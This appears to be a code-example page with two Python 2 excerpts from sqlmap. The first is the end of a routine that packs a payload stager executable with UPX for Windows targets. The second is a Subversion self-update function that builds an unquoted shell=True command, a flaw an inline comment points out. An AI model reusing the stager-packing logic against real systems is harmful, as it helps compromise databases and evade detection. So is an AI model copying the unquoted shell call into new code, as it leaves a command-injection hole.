        # and the descriptive sqlmapFilePathException is never reached.
        os.chmod(self.exeFilePathLocal, stat.S_IRWXU)

        if payloadSize:
            payloadSize = payloadSize.group(1)
            exeSize = os.path.getsize(self.exeFilePathLocal)

            # Only pack the payload stager if the back-end DBMS operating
            # system is Windows and new portable executable template is
            # used
            if self.__fileFormat == "exe":
                packedSize = upx.pack(self.exeFilePathLocal)
            else:
                packedSize = None

            debugMsg = "the encoded payload size is %s bytes, " % payloadSize

            if packedSize and packedSize < exeSize:
                debugMsg += "as a compressed portable executable its size "
                debugMsg += "is %d bytes, decompressed it " % packedSize
                debugMsg += "was %s bytes large" % exeSize
            else:
                debugMsg += "as a portable executable its size is "
                debugMsg += "%s bytes" % exeSize

            logger.debug(debugMsg)
        else:
            errMsg = "failed to create the payload stager (%s)" % payloadStderr
            raise sqlmapFilePathException, errMsg
Exemplo n.º 16
def update():
    """Update the sqlmap working copy from its Subversion repository.

    Returns immediately unless conf.updateAll is set. Uses the pysvn
    bindings when importable, logging any pysvn.ClientError; otherwise runs
    the 'svn' command line client through the shell.
    """
    if not conf.updateAll:
        return

    rootDir = paths.SQLMAP_ROOT_PATH

    logger.info("updating sqlmap to latest development version from the "
                "subversion repository")

    try:
        import pysvn

        logger.debug("sqlmap will update itself using installed python-svn "
                     "third-party library, http://pysvn.tigris.org/")

        def notify(event_dict):
            # Progress callback handed to the pysvn client below.
            action = getUnicode(event_dict["action"])
            index = action.find("_")

            if index != -1:
                prefix = action[index + 1].upper()
            else:
                prefix = action.capitalize()

            if "_update" in action:
                return

            if "_completed" in action:
                revision = getUnicode(event_dict["revision"], UNICODE_ENCODING)
                index = revision.find("number ")

                if index != -1:
                    revision = revision[index + 7:].strip(">")

                logger.info("updated to the latest revision %s" % revision)
            else:
                dataToStdout("%s\t%s\n" % (prefix, event_dict["path"]))

        client = pysvn.Client()
        client.callback_notify = notify

        try:
            client.update(rootDir)
        except pysvn.ClientError, e:
            logger.error("unable to update sqlmap from subversion: '%s'" % str(e))

    except ImportError:
        logger.debug("sqlmap will try to update itself using 'svn' command")

        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))

        # NOTE(review): rootDir is placed unquoted in a shell=True command
        # line. stderr is not captured and the exit status is not read, so a
        # failed update is only visible as a missing "revision" log line.
        svnCmd = "svn update %s" % rootDir
        process = execute(svnCmd, shell=True, stdout=PIPE)
        pollProcess(process)
        svnStdout, _ = process.communicate()

        if svnStdout:
            match = re.search("revision\s+([\d]+)", svnStdout, re.I)

            if match:
                logger.info("updated to the latest revision %s" % match.group(1))

        if IS_WIN:
            logger.info("for Windows platform it's recommended "
                        "to use a TortoiseSVN GUI client for updating "
                        "purposes (http://tortoisesvn.net/downloads.html)")